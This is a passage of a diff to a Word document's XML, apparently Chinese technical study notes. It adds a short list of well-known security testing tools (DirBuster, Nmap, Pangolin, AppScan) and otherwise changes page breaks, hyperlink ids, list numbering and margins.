+          <w:numId w:val="104"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>DirBuster</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>目录渗透工具，专门用于探测</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>服务器的目录和隐藏文件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="104"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>网络连接端软件，网络连接端扫描软件，用来扫描网上电脑开放的网络连接端</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="104"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Pangolin Sql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>注入工具</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="104"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>业界领先的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>应用安全监测工具（软件界面可以选择中文，不过是收费的）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="104"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>...</w:t>
       </w:r>
     </w:p>
@@ -38377,206 +42546,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>渗透注入检测工具</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="104"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>DirBuster</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>目录渗透工具，专门用于探测</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>服务器的目录和隐藏文件</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="104"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>网络连接端软件，网络连接端扫描软件，用来扫描网上电脑开放的网络连接端</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="104"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Pangolin Sql</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>注入工具</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="104"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>AppScan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>业界领先的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>应用安全监测工具（软件界面可以选择中文，不过是收费的）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="104"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="102"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:t>欺骗</w:t>
       </w:r>
     </w:p>
@@ -38627,7 +42596,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>透明</w:t>
       </w:r>
       <w:r>
@@ -39761,7 +43729,6 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>  var sut = new SystemUnderTest();</w:t>
       </w:r>
     </w:p>
@@ -39858,6 +43825,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>  await sut.StartAsync();</w:t>
       </w:r>
     </w:p>
@@ -40967,7 +44935,6 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Ex：</w:t>
       </w:r>
     </w:p>
@@ -41079,7 +45046,7 @@
         </w:rPr>
         <w:t>3.帕斯卡(</w:t>
       </w:r>
-      <w:hyperlink r:id="rId44" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
+      <w:hyperlink r:id="rId54" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41915,7 +45882,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>中心化配置</w:t>
       </w:r>
     </w:p>
@@ -42181,6 +46147,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>地址</w:t>
       </w:r>
       <w:r>
@@ -43375,7 +47342,6 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="zh-CN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>契约也支持类的层次结构，其命名空间会伴随整个层次机构。为了支持多态及包含其他对象的容器，</w:t>
       </w:r>
       <w:r>
@@ -44077,6 +48043,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -44609,7 +48576,6 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">　</w:t>
       </w:r>
       <w:r>
@@ -45100,7 +49066,7 @@
         </w:rPr>
         <w:t>，网址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId45" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
+      <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -45390,6 +49356,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DL - Dependency Lookup </w:t>
       </w:r>
       <w:r>
@@ -45590,7 +49557,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Spring.NET</w:t>
       </w:r>
     </w:p>
@@ -46684,7 +50650,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId46" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId56" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -46900,7 +50866,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId47" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId57" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -47645,7 +51611,7 @@
         </w:rPr>
         <w:t>好了，访问</w:t>
       </w:r>
-      <w:hyperlink r:id="rId48" w:history="1">
+      <w:hyperlink r:id="rId58" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -47883,7 +51849,7 @@
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
-      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
+      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>
       <w:docGrid w:type="lines" w:linePitch="312"/>
     </w:sectPr>
@@ -53997,6 +57963,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="42">
+    <w:nsid w:val="3A160E5F"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="1DCA388E"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="43">
     <w:nsid w:val="3BF24117"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3BF24117"/>
@@ -54145,7 +58224,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="43">
+  <w:abstractNum w:abstractNumId="44">
     <w:nsid w:val="3FF5D49F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3FF5D49F"/>
@@ -54294,7 +58373,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="44">
+  <w:abstractNum w:abstractNumId="45">
     <w:nsid w:val="437C347A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B142D010"/>
@@ -54407,7 +58486,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="45">
+  <w:abstractNum w:abstractNumId="46">
     <w:nsid w:val="4D52175F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="818A2BD6"/>
@@ -54520,7 +58599,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="46">
+  <w:abstractNum w:abstractNumId="47">
     <w:nsid w:val="5231649A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="675E1C70"/>
@@ -54669,7 +58748,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="47">
+  <w:abstractNum w:abstractNumId="48">
     <w:nsid w:val="5A4FAB1A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5A4FAB1A"/>
@@ -54818,7 +58897,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="48">
+  <w:abstractNum w:abstractNumId="49">
     <w:nsid w:val="5D443934"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="57E8B89E"/>
@@ -54907,7 +58986,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="49">
+  <w:abstractNum w:abstractNumId="50">
     <w:nsid w:val="61471FB5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="26087042"/>
@@ -54996,7 +59075,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="50">
+  <w:abstractNum w:abstractNumId="51">
     <w:nsid w:val="639186A0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="639186A0"/>
@@ -55145,7 +59224,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="51">
+  <w:abstractNum w:abstractNumId="52">
     <w:nsid w:val="653D1365"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5DC48D9E"/>
@@ -55294,7 +59373,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="52">
+  <w:abstractNum w:abstractNumId="53">
     <w:nsid w:val="6A042BEB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="6A042BEB"/>
@@ -55443,7 +59522,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="53">
+  <w:abstractNum w:abstractNumId="54">
     <w:nsid w:val="6C7508CD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="980A5440"/>
@@ -55592,10 +59671,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="54">
+  <w:abstractNum w:abstractNumId="55">
     <w:nsid w:val="6DEB2301"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="1C60F0CE"/>
+    <w:tmpl w:val="348AF822"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -55612,20 +59691,16 @@
         <w:sz w:val="20"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="2"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2、"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="1440"/>
-        </w:tabs>
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
-        <w:sz w:val="20"/>
+        <w:rFonts w:hint="default"/>
       </w:rPr>
     </w:lvl>
     <w:lvl w:ilvl="2" w:tentative="1">
@@ -55741,7 +59816,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="55">
+  <w:abstractNum w:abstractNumId="56">
     <w:nsid w:val="7A1CE74A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7A1CE74A"/>
@@ -55890,7 +59965,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="56">
+  <w:abstractNum w:abstractNumId="57">
     <w:nsid w:val="7BAD69E7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F4727B6E"/>
@@ -55980,7 +60055,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="57">
+  <w:abstractNum w:abstractNumId="58">
     <w:nsid w:val="7E1D9B84"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7E1D9B84"/>
@@ -56129,7 +60204,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="58">
+  <w:abstractNum w:abstractNumId="59">
     <w:nsid w:val="7FFE1E02"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7FFE1E02"/>
@@ -56288,7 +60363,7 @@
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="52"/>
+    <w:abstractNumId w:val="53"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="32"/>
@@ -56303,7 +60378,7 @@
     <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="57"/>
+    <w:abstractNumId w:val="58"/>
   </w:num>
   <w:num w:numId="10">
     <w:abstractNumId w:val="6"/>
@@ -56462,7 +60537,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="42"/>
+    <w:abstractNumId w:val="43"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="19"/>
@@ -57176,7 +61251,7 @@
     <w:abstractNumId w:val="38"/>
   </w:num>
   <w:num w:numId="48">
-    <w:abstractNumId w:val="58"/>
+    <w:abstractNumId w:val="59"/>
   </w:num>
   <w:num w:numId="49">
     <w:abstractNumId w:val="3"/>
@@ -58217,10 +62292,10 @@
     <w:abstractNumId w:val="33"/>
   </w:num>
   <w:num w:numId="89">
-    <w:abstractNumId w:val="50"/>
+    <w:abstractNumId w:val="51"/>
   </w:num>
   <w:num w:numId="90">
-    <w:abstractNumId w:val="50"/>
+    <w:abstractNumId w:val="51"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58250,7 +62325,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="91">
-    <w:abstractNumId w:val="50"/>
+    <w:abstractNumId w:val="51"/>
     <w:lvlOverride w:ilvl="0">
